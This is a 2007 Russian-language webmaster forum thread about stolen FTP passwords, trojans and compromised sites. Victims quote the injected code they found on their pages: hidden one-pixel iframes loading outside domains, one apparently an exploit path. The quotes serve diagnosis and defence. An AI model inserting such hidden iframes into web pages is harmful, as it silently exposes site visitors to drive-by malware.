Милитарист
С нами с 13.01.06
Сообщения: 677
Рейтинг: 569
|
 Добавлено: 18/05/07 в 14:00 |
| Hide-R писал: | | pierx: У KeePass, на котором я сижу он очень мощный. |
Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига. 
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего..
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 18/05/07 в 19:35 |
| Юнга писал: | Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига.
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего.. |
в висте вообще то встроенный автобэкап достаточно удобный есть.
я через него ноут на десктоп бэкаплю
|
|
|
|
| |
С нами с 05.11.03
Сообщения: 140
Рейтинг: 98
|
| Добавлено: 18/05/07 в 19:58 |
Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел.
|
|
|
|
| |
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
| Добавлено: 18/05/07 в 20:31 |
просто надо нормальный софт использовать а не качать крэки с вареза, тогда шансы быть затрояненным сильно уменьшаются
|
|
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
| |
full-plastic programmist
С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779
|
| Добавлено: 18/05/07 в 22:34 |
Stek: тут дело не в креках.
я тоже такую заразу поймал, и даже почти догадываюсь где...
Swapper: проверь вот это: %windows%\csrss.exe
по принципу действия очень похож на тот что Ман ссылку давал, тоже имитирует нажатия кнопок в окнах сообщений (т.е. оутпост и каспер не спасают) запускается как системный процесс - просто так не снимешь.
|
|
|
|
вот соскучился по мастеру...
|
0
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 19/05/07 в 13:22 |
если есть паранойя или подозрение, запускайте AVZ4 с опциями поиска рут-китов и юзер-китов и максимальным уровнем анализа
|
|
|
|
| |
С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222
|
| Добавлено: 19/05/07 в 23:40 |
пиздец какой то. на всех доменах поголовно на мордах ифрейм
что он грузит ..х.знает но грузит что то тяжелое в комп и сеть начинает тупить.
везде вот это
| Код: |
<iframe src='чttp://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
<iframe src='чttp://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
|
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 20/05/07 в 12:24 |
Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить?
|
|
|
|
| |
С нами с 01.11.06
Сообщения: 316
Рейтинг: 293
|
| Добавлено: 20/05/07 в 14:38 |
Есть небольшое подозрение, что подцепил кто-то из саппорта разработчиков софта(сж-скриптов, ротаторов, к примеру), которые для установки этого софта просят фтп/ssh-доступ на сервак.
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 20/05/07 в 14:53 |
| miroz писал: | | Как-то подозрительно, уж очень сильная эпидемия началась, где все могли это подцепить? |
да эпидемия уже несколько месяцев идет
|
|
|
|
| |
С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222
|
| Добавлено: 20/05/07 в 15:09 |
ну у меня к примеру нет сиджеев, а трой стоял даже на тех сайтах где вообще ничего нет, один индекс с надписью comming soon
и с сапортом я не общаюсь ни с каким. по аське пароли тоже не проходили
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 20/05/07 в 15:26 |
может пароли хранил в фтп-клиенте? или еще где на компе
|
|
|
|
| |
С нами с 21.02.07
Сообщения: 44
Рейтинг: 39
|
| Добавлено: 20/05/07 в 16:06 |
наивные, сейчас пароли к фтп...совсем не троянами пиздятся....
|
|
|
|
| |
С нами с 19.12.06
Сообщения: 528
Рейтинг: 511
|
| Добавлено: 21/05/07 в 01:30 |
| Юнга писал: | Сенкс, уже щупаю его.. Wand - сука удобный, но не секьюрный нифига.
А как ты автоматом с флешки бэкап делаешь? Встроенные средства или руками чего-то воротил? Я вот под Вистой сходу так и не нашел ничего.. |
Бекап мне плагин делает. Их пара есть на странице плагинов KeePass...
|
|
|
|
| |
full-plastic programmist
С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779
|
| Добавлено: 21/05/07 в 09:41 |
| _Milan_ писал: | | наивные, сейчас пароли к фтп...совсем не троянами пиздятся.... |
угу, а то что я какую то дрянь при этом у себя нашел - это типа совпадение?
|
|
|
|
вот соскучился по мастеру...
|
0
|
|
| |
Дизайн, вёрстка, то сё
С нами с 16.10.02
Сообщения: 4875
Рейтинг: 3947
|
| Добавлено: 21/05/07 в 10:36 |
Milan, очень информативно отписал, спасибо
/me пометил себе "совсем не троянами.."
|
|
|
|
| |
С нами с 06.12.05
Сообщения: 9710
Рейтинг: 1222
|
| Добавлено: 21/05/07 в 17:33 |
понеслось по второму кругу, только с домена РУ на сей раз. начал массово менять пароли, может поможет.
проверяйте свои сайты.
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 22/05/07 в 09:05 |
Бляяяя, вот, сидишь читаешь, думаешь с тобой такого не случиться  (
Сегодня прихожу. смотрю на одном сайте провалилась прода и траф ниже плинтуса, открываю, а там бля такая хуйня
| Код: | | <iframe src="http://antispyx.info/exp/" width=1 height=1 style="display:none"></iframe> |
Самое интересное, на этом дедике несколько сайтов, более того на этом айпищнике несколько доменов, НО ифрем вставили только на одном домене, на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрыть (
Вот и думайте.
На других доменах ничего не повесили.
Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на других (
Бля, с этим надо что-то делать!
ЗЫ: Как самому ограничить заход по ФТП только с определенных IP?
|
|
|
|
| |
С нами с 19.01.06
Сообщения: 22
Рейтинг: 16
|
| Добавлено: 22/05/07 в 09:12 |
| miroz писал: | на котором были открыты дополнительные два ФТП, один из них открывал разработчику скрипта, а потом забыл закрыть(
Вот и думайте.
На других доменах ничего не повесили.
Троян.... вряд ли, сижу через Лису + NOD32, все конесно может быть, но не вериться, был бы троян наверно повесили и на других(
|
ну у разработчика скрипта троян значит, что непонятного то
| Цитата: |
ЗЫ: Как самому ограничить заход по ФТП только с определенных IP? |
в файерволе закрыть 21 порт и разрешить только для своего IP
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 22/05/07 в 09:17 |
| Swapper писал: | | Да, недавно фтп-пароль таким образом судя по всему сперли. Но у себя трояна не нашел. |
Подозреваю, что это не через трояна ставят, но как не знаю
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 22/05/07 в 09:18 |
| XXX-Server писал: |
в файерволе закрыть 21 порт и разрешить только для своего IP |
В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружу
|
|
|
|
| |
С нами с 19.01.06
Сообщения: 22
Рейтинг: 16
|
| Добавлено: 22/05/07 в 09:31 |
| miroz писал: | В каком файерволе?
На дедике стоит CentOS+DirectAdmin. Я как то с Линухом не очень дружу |
ну админа попросить значит
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 22/05/07 в 09:36 |
| _Milan_ писал: | | наивные, сейчас пароли к фтп...совсем не троянами пиздятся.... |
Может подробности расскажешь?
|
|
|
|
| |
С нами с 04.07.06
Сообщения: 4956
Рейтинг: 3016
|
| Добавлено: 22/05/07 в 09:38 |
| XXX-Server писал: | | ну админа попросить значит |
Админа хрен достанешь (
|
|
|
|
| |
С нами с 19.01.06
Сообщения: 22
Рейтинг: 16
|
| Добавлено: 22/05/07 в 09:40 |
| miroz писал: | | Админа хрен достанешь( |
ну мы можем сделать, за небольшую плату и при наличии свободного времени
стукни ближе к вечеру к колору, 10-95-48-1-7-9
|
|
|
|
| |
